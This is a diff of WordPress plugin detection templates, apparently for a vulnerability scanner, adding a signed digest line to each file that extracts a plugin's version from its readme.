+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100c6690a70e85faae20dfb3c22ceb15cc1759f4d21cb06c1d3c3342eb306b676a5022073fdfa81aca6a92892b6f2354d49cd7ac3481bee8222a107c77a2aee405d8f4d:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022003e6fd06e39d1b0eb64c55042b27db351ba107d7ca403294da3eaf86c98b7ab702203265c5a7ac4bc9882cc2f555ee1b55bc2d83faf433cd3de429670bfa9504bf9e:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402202f2ce60516e7f5344e139da66453eeac1dd487a8e693db0abf599de6d3252dc4022071a5b3599ea84257f8dd3ada74706ef4c0302f6f2ead65f25cb43552d7389f4c:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100830438c6ca366bfd07e7c172ea0140d132e533303b8c81ba0e53a788683671d002201d8ce9e4c213c2bae3a28894e9beb33a1ee12e72f5fd92f46a7727baf64a758a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022054e92e25c9ccc8f0a07e44f95f2097a053eadaeb5c3677423190ba0ccda493b7022100c3b9218000341effc7ff77e9e222ba11f4be18b1da0748bcdac48b81aab4e3c0:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100a5d7335d6685d1a2d8bafa4258e37ecdcca870d5f1252e22b443e9c90899317702205b76da7912eb7a318baf6ee88a931e76e8d6dd85d6527b73cfe6515338178481:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100a11e3c69a67d779c68460f21bdbbf6b99f3af075cc6c5a3992bda6be1660051e02206531f4e15019946a02d0d9690c57ca8efea83d3e5c29789b3752d3dc8c915586:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100d618a1250d75cf3df074c806580622baf25e9ea51c5523996fd554761130c477022100da0e117c3d3f229ab1eb5a4bceff7481a4296d3aa70df48c3963ed59b6404a4a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022058d588e6a99f8be5f8bfe74b2666b028833ffc623e96dad92d189ca813466590022100a2ef612d973f97fea7a15c7d2f9d3e64975cafc54c3861531874bfbcad6347b2:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100c2956387ac87ce8d7b62167d3912a625680266d14834b27dc7d90e87cd79c132022011b053a5a1c9974d7f2764850e4e66a6a775c64c1f3e1e2d2339db2fee860bca:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100be2c6ee9866f503f89c932e3671a87d5066ed4fabfad643da6bd0d7529eba0be022074fe2b6e6f3d28fda1d301816d5ca516db16078e6cfffe646b7a46809717f7d4:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a0047304502203c7662052305399d5c70591b32ef0ac18dc24ee01e025e7fd31331ce9ee47c15022100810765f31d67309949fbe5ea589d2530fcf291c9269648978231f0d32061f3b2:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml
+++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402204d84b4a49890a7b45f936e76cf886f4a181a4cecf937656c81885a8ee57551850220603ac8b74d54715d65082b4802ddef59d2ba71bf4c2e8f58028a3d156a3da827:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402206d81fbfb995872f999cb1ad7de3c815be5b4c6f4bd5662bad5886b244a200811022023b60d90f9cfb711c1db2447e6573b16d512e94efaf77a1a93ef9a86b87bf71f:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a0047304502207c8abad4d1c7ef15f08cdba5345ff72f5280600120e0435171718937eb46b5a7022100e13e06b1b0fd04a62fdfb55f7b554c0efb7680b6d876852584f2fddf8d9aaf35:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402205e863310686703afd5c7ebbee2acfd7a95f1a82efbf19e878a1adc7a6d43b9fb0220101b8e0f62c5612896fd2610147920d6be221349660a9914efa46883b900cd0b:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100f9c2f5faae7edfc45af1d461382056a7584330a63157b3092b1e14c3123a6c44022003851ada8be8144eae8c8af450a2532555d41b6989fc1801948167c783400e64:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a0047304502205c8d47be92257a4ec62f273c7db194a9faf93052a1e0f13bf274615adaefcb57022100b6622e0d9317775820605676f2a82e22fc19ad59cee2efc07edea879259aae93:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022017903ab3d10e96d5d91900e5f6271a2f43ceaaf93ca8084aea44106b7888ba6302203b462a0d692ca2b6a597db36e73f677efd64f89fc048c3d147294ad9e9eea1ed:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022069e02202e7ff83961b5b53cdbfd45103fe25d8a80184f3d65bd0f5d7fe7b4eda022100dfc4667abee1853cbfdd1f9495a1770cd873a3b5f340ca073e57e0ebb0e90588:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a0047304502201ffaefde26050311a50cef34fcab2eae3ca70cc7e8ca581181e61c9570494a15022100a95b1405e82b0cc3afc3c117224051e8e95c955b8be73afcc451a2f136392ef0:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100c22c21c6e2027804c840f021f155166efec58669a9d58ba19a54d2632d4007100221008e88cea6f8f6058fad967a73579efcbe869cdc495a46b462890dbe8b147d157a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a004730450221009a7cbaa647896edf38d00b7b0c5d0afec2ad2910b2ed0ed27ca8bc17b9c883d1022063ced44a404eb65b9e51443564ab5cd5f3d63bd7336f91ed64a1805abde4241f:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a004730450220241b3aa9cd26182811d67fb2509a4b6c7759d5735c8e3edb41d3d30dfe0eb7bc022100cf84175d0ddcf5b1aaeb840dfd6059fb25ea6623b6d8194da638bc2154a2059f:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100924dc7291bdaacbe1340c7d7d8750e8bcec961a50891191ff07596d3b54e59fa022100c9a892e8790800717040ccf5dd3c169dc69d9eae770bb0fb5219f7d097317956:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022071cc1ea5c48be90fb4cb818be14cab5064b43ab8de60d301c3659260943b5dbc022100e5fef270ee7a95a0f45fdba2c51222ed855db26da44426675aa6e4767cc2717b:922c64590222798bb761d5b6d8e72950
--- a/Show More
+++ b/Show More
`@ -1 +1 @@`
	`f95ff9c55f4996a2780c830e4149e7b7`	`834a3ed8fe3e7171d2135982772985b0`